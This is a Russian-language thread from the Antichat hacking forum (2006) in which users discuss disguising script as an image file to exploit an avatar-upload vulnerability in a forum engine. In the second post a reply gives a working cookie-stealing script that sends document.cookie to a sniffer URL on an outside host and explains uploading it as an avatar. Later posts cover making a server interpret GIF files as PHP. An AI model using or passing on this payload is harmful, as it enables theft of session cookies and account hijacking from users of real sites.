HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

валидный графический файл
  #1  
Старый 01.03.2006, 20:57
Vovec
Новичок
Регистрация: 31.08.2005
Сообщений: 27
С нами: 10891700

Репутация: 3
По умолчанию валидный графический файл

Обьясните незнающему что такое валидный графический файл с расширением 'phtml' или 'php3, с расширеннием понятно, а вот до него какие то мудрённые слова. В поисковиках с таким вопросом ничего не нашёл, вот и задую этот вопрос тут. Я понимаю это так, что это файл с 2ым расширеннием например "script.php3.jpg" так это или нет? Кому халявный + к репе?
 
Ответить с цитированием

  #2  
Старый 01.03.2006, 22:13
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
С нами: 10814786

Репутация: 113
По умолчанию

Открываешь графический файл блокнотом , удаляешь всё что там есть и вставляешь свой код например код для получаний куков на сниффер

Код:
<script>img=new Image(); img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
и сохраняешь вот тебе и валидный графический файл
 
Ответить с цитированием

  #3  
Старый 02.03.2006, 00:43
Vovec
Новичок
Регистрация: 31.08.2005
Сообщений: 27
С нами: 10891700

Репутация: 3
По умолчанию

За ответ спасибо...
Ну вот с кодом что-то не то или у меня руки кривые. Вообщем не работает, он должен по сути срабатовать при открытии этой якобы картинки или как?
 
Ответить с цитированием

  #4  
Старый 02.03.2006, 01:04
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
С нами: 10814786

Репутация: 113
По умолчанию

Угу! Точно ....но это смотря куда ты это впихаешь
 
Ответить с цитированием

  #5  
Старый 02.03.2006, 01:14
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
С нами: 10814786

Репутация: 113
По умолчанию

Я не точно выразился сорри ...значит так. загружаешь фотку на какой нить чат или форум ( это не всегда срабатывает) смотришь в свойство изоброжения ...там увидешь полный путь к изоброжению например _http://forum.antichat.ru/image.php?u=19805&dateline=1140119839 ( это мой аватар ) берешь этот линк если в чате это хочешь сделать пишеш в место домашней странички например ...далее действуй по своей фантазии
 
Ответить с цитированием

  #6  
Старый 03.03.2006, 19:15
Vovec
Новичок
Регистрация: 31.08.2005
Сообщений: 27
С нами: 10891700

Репутация: 3
По умолчанию

С этим понятно, только наверно это не совсем то что мне нужно. Слазийти по этому URL поймёти про что я http://www.securitylab.ru/vulnerability/205264.php Сделал всё как сказал Electro, аватар всё равно заливаться нехочет, пробывал манипуляции с расширенниями, но всё равно шляпа. Подскажите где косяк?
 
Ответить с цитированием

  #7  
Старый 05.03.2006, 04:00
Гаврила
Постоянный
Регистрация: 24.10.2005
Сообщений: 343
С нами: 10812683

Репутация: 134
По умолчанию

Цитата:
Сообщение от Vovec  
....аватар всё равно заливаться нехочет, пробывал манипуляции с расширенниями, но всё равно шляпа. Подскажите где косяк?
А чего пишет?
 
Ответить с цитированием

  #8  
Старый 10.03.2006, 02:29
Vovec
Новичок
Регистрация: 31.08.2005
Сообщений: 27
С нами: 10891700

Репутация: 3
По умолчанию

Неужели нет на этом форуме человека который пользовалься этой уязвимостью в движке http://www.securitylab.ru/vulnerability/205264.php Для проверки даже на локалхосте поставил версию подходяшию для взлома через эту уязвимость, что же я не так делаю.....
 
Ответить с цитированием

  #9  
Старый 03.03.2006, 19:24
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
С нами: 10958786

Репутация: 1034


По умолчанию

Для того чтобы сработал этот код в формате гиф нужно гиф интерпритировать как php это для начала....
 
Ответить с цитированием

  #10  
Старый 04.03.2006, 01:15
Vovec
Новичок
Регистрация: 31.08.2005
Сообщений: 27
С нами: 10891700

Репутация: 3
По умолчанию

А не мог бы для начала мне обьяснить как это сделать, "гиф интерпритировать как php", можно по проще объяснить что надо сделать? Или чтоб я вам мозги особо не парил дать URL с инфой, где это всё по полочкам разложенно, если есть такая...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Принцип работы антиличеров... Trinux PHP 18 26.08.2005 11:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.